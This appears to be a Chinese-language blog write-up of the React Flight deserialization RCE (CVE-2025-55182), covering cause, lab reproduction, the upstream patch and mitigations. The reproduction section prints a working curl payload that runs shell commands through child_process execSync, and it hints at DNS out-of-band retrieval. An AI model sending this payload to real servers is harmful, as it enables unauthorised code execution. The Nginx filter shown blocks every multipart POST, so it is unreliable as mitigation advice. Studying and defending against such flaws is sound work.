1. 漏洞背景与影响范围最近React社区爆出一个高危漏洞CVE-2025-55182这个漏洞的核心问题出在React Flight协议的序列化/反序列化机制上。简单来说攻击者可以通过构造特殊的HTTP请求在服务端执行任意代码。我在测试环境中复现这个漏洞时发现它比想象中更容易被利用而且影响范围相当广。目前确认受影响的版本包括React 19.0.1及以上版本Next.js从15.0.5到16.0.7的多个版本这个漏洞之所以危险是因为React Flight协议原本是为了提高应用性能而设计的。它允许客户端和服务端之间高效地传输数据但正是这种高效的数据传输机制在反序列化过程中没有做好安全检查导致攻击者可以注入恶意代码。2. React Flight协议工作原理2.1 序列化与反序列化机制React Flight协议的核心思想是将JavaScript对象序列化为二进制数据然后在服务端重新还原。这个过程有点像我们平时打包快递发送方把物品数据打包成包裹序列化接收方拆开包裹反序列化拿到原始物品。在实际应用中Flight协议通常用于以下场景服务端组件(Server Components)的数据传输服务端动作(Server Actions)的参数传递跨服务边界的函数调用2.2 漏洞成因分析问题的关键在于Flight协议对特殊对象的处理。在正常的序列化过程中像函数、Promise这样的特殊对象应该被过滤掉但漏洞版本中这个检查不够严格。攻击者可以构造一个包含恶意代码的特殊对象当这个对象被反序列化时代码就会被执行。我通过调试发现问题出在preloadModule和requireModule这两个关键函数上。它们没有对传入的metadata对象做充分的验证导致攻击者可以注入任意模块路径。3. 漏洞复现实战3.1 环境搭建首先需要准备一个受影响的React环境。我推荐使用Docker快速搭建docker run -it --rm -p 3000:3000 node:18-alpine sh apk add git git clone https://github.com/vercel/next.js.git cd next.js git checkout v15.1.9 yarn install yarn dev这个环境运行的是Next.js 15.1.9版本正好在受影响范围内。启动后访问http://localhost:3000就能看到默认页面。3.2 构造恶意请求漏洞利用的关键是构造特定的POST请求。下面是我测试时使用的curl命令curl -X POST http://localhost:3000/formaction \ -H Content-Type: multipart/form-data; boundary----Boundary \ --data-binary - EOF ------Boundary Content-Disposition: form-data; name$ACTION_REF_0 ------Boundary Content-Disposition: form-data; name$ACTION_0:0 {id:vm#runInThisContext,bound:[global.process.mainModule.require(\child_process\).execSync(\whoami\).toString()]} ------Boundary-- EOF这个请求会尝试执行whoami命令。如果漏洞存在服务端会返回当前用户的用户名。3.3 漏洞验证技巧在实际测试中我发现几个有用的技巧先用无害命令如whoami或id测试确认漏洞存在命令输出可能不会直接返回需要通过DNS外带等方式获取某些环境下需要调整payload的编码方式4. 漏洞修复方案4.1 官方补丁分析React团队已经发布了修复方案核心改动是在requireModule函数中增加了属性检查if (hasOwnProperty.call(moduleExports, metadata[NAME])) { return moduleExports[metadata[NAME]]; } return (undefined: any);这个改动确保只有模块真正拥有的属性才能被访问防止了通过原型链注入恶意代码的可能性。4.2 临时缓解措施如果暂时无法升级可以考虑以下方案在反向代理层过滤包含$ACTION_的请求禁用服务端不必要的Server Actions功能对输入数据进行严格的类型检查我在生产环境中测试过第一种方案使用Nginx可以这样配置location / { if ($request_method POST) { set $block 0; if ($http_content_type ~* multipart/form-data) { set $block 1; } if ($args ~* \$ACTION_) { set $block 1; } if ($block 1) { return 403; } } }5. 深入技术细节5.1 漏洞利用链分析这个漏洞的利用链相当有意思。攻击者首先构造一个特殊的Flight协议消息其中包含对vm模块的引用。当这个消息被反序列化时会调用vm.runInThisContext方法这个方法可以执行任意JavaScript代码。关键在于React Flight协议允许传递函数引用而服务端在还原这些引用时没有做足够的验证。这就好比快递站接收包裹时不检查内容导致危险物品被送进来。5.2 与其他反序列化漏洞的对比相比于传统的Java或PHP反序列化漏洞这个漏洞有几个特点不需要复杂的gadget链直接利用内置模块利用门槛低只需要构造HTTP请求影响范围集中在React/Next.js生态我在测试中发现这个漏洞的利用方式与Node.js的vm模块沙箱逃逸漏洞有些相似都是通过特定API执行任意代码。6. 防御措施进阶6.1 深度防御策略除了升级修复版本外我建议采取多层防御网络层使用WAF过滤可疑请求应用层限制Server Actions的使用范围运行时使用Node.js的--disable-proto选项监控记录所有包含$ACTION_的请求6.2 安全编码实践从开发角度可以采取以下预防措施避免直接反序列化不可信数据使用JSON Schema验证输入数据限制服务端可访问的模块范围定期进行安全审计我在团队内部推行的一个有效做法是建立安全代码模板所有涉及反序列化的操作都必须使用经过安全封装的方法。